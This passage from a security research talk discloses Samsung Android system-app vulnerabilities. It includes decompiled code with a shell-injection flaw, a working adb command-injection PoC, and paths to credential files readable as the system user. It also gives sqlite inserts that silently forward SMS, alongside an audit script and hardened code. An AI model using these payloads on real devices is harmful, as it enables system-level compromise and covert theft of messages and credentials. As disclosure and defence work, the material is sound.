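                         % (comp.tag, perm, level)))
    return findings


# Constructed sample manifest (invented names, not the real serviceModeApp.apk).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.oemtool" android:sharedUserId="android.uid.system">
  <permission android:name="com.example.permission.OEM_ONLY"
      android:protectionLevel="signatureOrSystem"/>
  <application>
    <receiver android:name=".DumpReceiver">
      <intent-filter><action android:name="com.example.action.DUMP"/></intent-filter>
    </receiver>
    <receiver android:name=".UpdateUrlReceiver"
        android:permission="com.example.permission.OEM_ONLY">
      <intent-filter><action android:name="com.example.action.UPDATE_URL"/></intent-filter>
    </receiver>
    <service android:name=".InternalService" android:exported="false"/>
    <service android:name=".SyncService" android:exported="true"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for severity, component, message in audit_manifest(SAMPLE_MANIFEST):
        print(severity, component, message)
```

On the sample this reports the system sharedUserId, the unprotected receiver and the unprotected exported service as HIGH, and lists the receiver behind the signatureOrSystem permission as INFO; the non-exported service is silent. Running it across every APK of a firmware image gives the same shortlist the ASADatabase query produced, with the protectionLevel check telling you which "fixed" components are actually closed to third-party apps.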
Vuln5 - serviceModeApp.apk
FTATDumpReceiver.onReceive()
public void onReceive(Context paramContext, Intent paramIntent)
{
    String str1 = paramIntent.getAction();
    Log.i("FTATDumpReceiver", "onReceive action=" + str1);
    if (str1.equals("com.android.sec.FTAT_DUMP"))
    {
        // FILENAME comes straight from the broadcast Intent, with no validation
        String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
        Calendar localCalendar = Calendar.getInstance();
        String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get(1)); // Calendar.YEAR
        [...]
        String str9 = str8 + new DecimalFormat("00").format(localCalendar.get(13)); // Calendar.SECOND
        Log.i("FTATDumpReceiver", "Dump Filename is" + str9);
        Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);
        localIntent2.setFlags(268435456); // Intent.FLAG_ACTIVITY_NEW_TASK
        localIntent2.putExtra("FILENAME", str9);
        paramContext.startService(localIntent2);
    }
    [...]
}
Vuln5 - serviceModeApp.apk
FTATDumpService.onStartCommand()
public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
{
    Log.i("FTATDumpService", "onStartCommand()");
    this.mHandler.sendEmptyMessage(1005);
    final String str = paramIntent.getStringExtra("FILENAME");
    [...]
    new Thread(new Runnable()
    {
        public void run()
        {
            FTATDumpService.this.sendMessage(
                FTATDumpService.access$600(FTATDumpService.this),
                FTATDumpService.this.mHandler.obtainMessage(1014)
            );
            // the attacker-controlled FILENAME is concatenated into a shell command line
            if (FTATDumpService.this.DoShellCmd("dumpstate > /data/log/" + str + ".log"))
                FTATDumpService.this.mHandler.sendEmptyMessage(1015);
            [...]
        }
    }).start();
    return 0;
}
Vuln5 - serviceModeApp.apk
FTATDumpService.DoShellCmd()
private boolean DoShellCmd(String paramString)
{
    Log.i("FTATDumpService", "DoShellCmd : " + paramString);
    String[] arrayOfString = new String[3];
    arrayOfString[0] = "/system/bin/sh";
    arrayOfString[1] = "-c";
    arrayOfString[2] = paramString; // the whole string is parsed by the shell, as the system user
    Log.i("FTATDumpService", "exec command");
    Runtime.getRuntime().exec(arrayOfString).waitFor();
    Log.i("FTATDumpService", "exec done");
    Log.i("FTATDumpService", "DoShellCmd done");
    return true;
}
I don't need root when I have system
Srsly?
Vuln5 - serviceModeApp.apk
PoC
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }
Broadcast completed : result=0
$ adb shell cat /sdcard/shellescape
uid=1000(system) gid=1000(system) groups=1001(radio),1006(camera),
1007(log),1015(sdcard_rw),1023(media_rw),1028(sdcard_r),2001(cache),
3001(net_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct)
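The fix the conclusion hints at is a permission on the receiver plus never handing the FILENAME extra to "/system/bin/sh -c". As an added example (not Samsung's code and not from the talk), here is a hardened stand-in for DoShellCmd() in Java; the dump directory and the /system/bin/ftat_dump tool path are assumptions made for the demo.

```java
import java.io.File;
import java.io.IOException;
import java.util.regex.Pattern;

/** Hardened stand-in for DoShellCmd(): fixed argv, no shell, validated file name. */
public final class SafeDumpRunner {
    // Only plain file names: must start alphanumeric, so "..", "." and "-flag" never pass.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._-]{0,63}");

    private final File dumpDir;    // the only directory a dump may be written to
    private final String dumpTool; // hypothetical fixed binary that writes the dump

    SafeDumpRunner(File dumpDir, String dumpTool) {
        this.dumpDir = dumpDir;
        this.dumpTool = dumpTool;
    }

    /** Returns the canonical target inside dumpDir, or null when the untrusted name must be refused. */
    File resolveTarget(String untrustedName) throws IOException {
        if (untrustedName == null || !SAFE_NAME.matcher(untrustedName).matches()) {
            return null; // "../", ";", ">", "#", spaces: all rejected before any process is started
        }
        File target = new File(dumpDir, untrustedName).getCanonicalFile();
        // Defence in depth: the canonical path must still lie below the canonical dump directory.
        String base = dumpDir.getCanonicalPath() + File.separator;
        return target.getPath().startsWith(base) ? target : null;
    }

    // Runs the tool with an argument list; unlike "sh -c <string>", nothing is parsed by a shell.
    boolean runDump(String untrustedName) throws IOException, InterruptedException {
        File target = resolveTarget(untrustedName);
        if (target == null) {
            return false; // refuse; do not echo the attacker-controlled value into logcat
        }
        Process p = new ProcessBuilder(dumpTool, target.getPath()).redirectErrorStream(true).start();
        return p.waitFor() == 0;
    }

    public static void main(String[] args) throws Exception {
        // Placeholder paths; the receiver calling this must also carry a signature-level android:permission.
        SafeDumpRunner r = new SafeDumpRunner(new File("/tmp/ftat-dump"), "/system/bin/ftat_dump");
        // The exact FILENAME payload from the PoC above is refused: prints "null".
        System.out.println(r.resolveTarget("../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#"));
        // A benign name resolves to a file strictly below the dump directory.
        System.out.println(r.resolveTarget("ftat_dump.log"));
    }
}
```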
Inventory of the permissions obtained
Inventory
Combination of all the permissions of sharedUserId=system applications
A total of 156 permissions
Like android.permission.INSTALL_PACKAGES (pm install package.apk)
Like access to mail accounts, SMS, internet, ...
We can inject code inside other applications (dalvik-cache)
Sensitive information can be read
Wifi keys: /data/misc/wifi/wpa_supplicant.conf
Password/pincode/pattern: gesture.key, password.key, ...
Mail accounts and Google Account token: /data/system/user/X/accounts.db
Objectives
Samsung MDM for fun and laziness
Samsung's MDM : SAFE
Discovery of SAFE
SAmsung For Enterprise: a framework for Samsung models
Exposes an API for the commercial MDMs
Used partly by SamsungDive
Implemented partly in /system/framework/services.odex
Study of the permission system
Many modules : BrowserPolicy, DevicePolicy, ...
Each module checks that the calling application has the correct permission:
One permission per module : android.permission.sec.MDM_XXX
Enforcement via enforceXXXPermission()
SAFE : The god mode
The framework doesn't check the permission when the calling application is system (UID = 1000)
SAFE: The god mode
MDM usage without any restriction
The features implemented (for us?):
Application Policy - application backup, application uninstall, ...
Mail Account Policy - manage mail accounts, behaviour when SSL certificates are invalid, ...
Enterprise VPN Policy - retrieval of the certificates, passwords, ...
Phone Restriction - block WiFi, VPN connection, USB Debug, OTA firmware updates, reset to factory settings, ...
Misc Policy - retrieve the clipboard content, ...
We can "infect" someone and prevent him from receiving firmware updates that correct vulnerabilities.
I can haz your sms?
SMS Forwarding
DSMLawmo.apk
Study of the applications listening for incoming SMS
BroadcastReceiver listening for Intent with action android.provider.Telephony.SMS_RECEIVED
DSMLawmo.apk seems to have an interesting functionality...
[...]
if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))
{
Util.Logd("Start to SMS forwarding service");
[...]
SMS Forwarding
DSMSMSReceiver
onReceive() of DSMSMSReceiver checks:
If an SMS just arrived and it has not already been received recently
If SMS forwarding is enabled
SMSForwarding key in the object DSMRepository
If all these conditions are met, the smartphone forwards the SMS to the configured phone number
Transparent to the user...
DSMRepository
DSMRepository queries a ContentProvider:
content://com.sec.dsm.system.dsmcontentprovider/dsm
sqlite db -> /data/data/com.sec.dsm.system/databases/profile.db
dsm table, column Key = SMSForward?
SMS Forwarding
PoC (Will not be patched, it's a feature!)
system@android:/data/data/com.sec.dsm.system/databases $ ls -al
-rw-rw---- system system 16384 2013-01-18 22:18 profile.db
system@android:/data/data/com.sec.dsm.system/databases $ sqlite3
sqlite> insert into dsm values(null,"SMSForwarding","Enable");
sqlite> insert into dsm values(null,"SMSRecipient","+33*NUMERO*");
Scope of the vulnerabilities
Model                    Release date   V1    V2   V3   V4   V5
Samsung Galaxy S2        05/2011        ✓     ✓    ✓    ✓    -
Samsung Galaxy Tab 1     06/2011        N.A   ✓    ✓    ✓    -
Samsung Galaxy Note 1    11/2011        ✓     -    ✓    -    -
Samsung Galaxy S3        05/2012        ✓     ✓    ✓    ✓    ✓
Samsung Galaxy Tab 2     05/2012        N.A   ✓    -    ✓    ✓
Samsung Galaxy Note 2    10/2012        -     ✓    -    ✓    ✓
Samsung Galaxy S3 mini   11/2012        -     ✓    -    ✓    ✓
Samsung Galaxy S4        04/2013        -     -    -    -    -
Number   Description
V1       SMS/MMS sending and files exfiltration
V2       Arbitrary HTTP requests execution
V3       Getting C.R.U.D rights on SMS/Contacts/Memo and more
V4       Sync and remote control for fun and profit
V5       System app escape shell
Conclusion
Agenda
03/26 - A dozen vulnerabilities reported to Samsung
04/18 - Samsung has finished analyzing our vulnerabilities
06/06 - No patch is currently deployed on the Samsung models
The vulnerabilities are patched in the leaked Android 4.2.2 I9300 ROM, whose release is scheduled for June
The vulnerabilities
The vulnerabilities are easy to find and exploit
It's not only Samsung, we have seen similar vulnerabilities on other (all?) manufacturers...
Often, only a permission on the right component is needed to prevent the vulnerability
The Samsung frontend gets bigger on each release, expanding the attack surface...
Google needs to do something, because the manufacturers weaken the security of Android
Some solutions?
Antivirus? Pretty useless on Android (only signature based?)
Flash a custom ROM found on the Internet and without the Samsung frontend?
Do you trust the ROM creator?
Since Jelly Bean, there is SELinux on Android
If correctly used, it can solve many problems
But it's hard for an end user to configure it...
Configuration must be done by the manufacturers, who need to do a good job here
And having seen their applications... not really confident about this
Buy Nexus phones or the Samsung Galaxy S4 "Google Edition"
Thank you for your attention
Questions?
contact@quarkslab.com | @quarkslab.com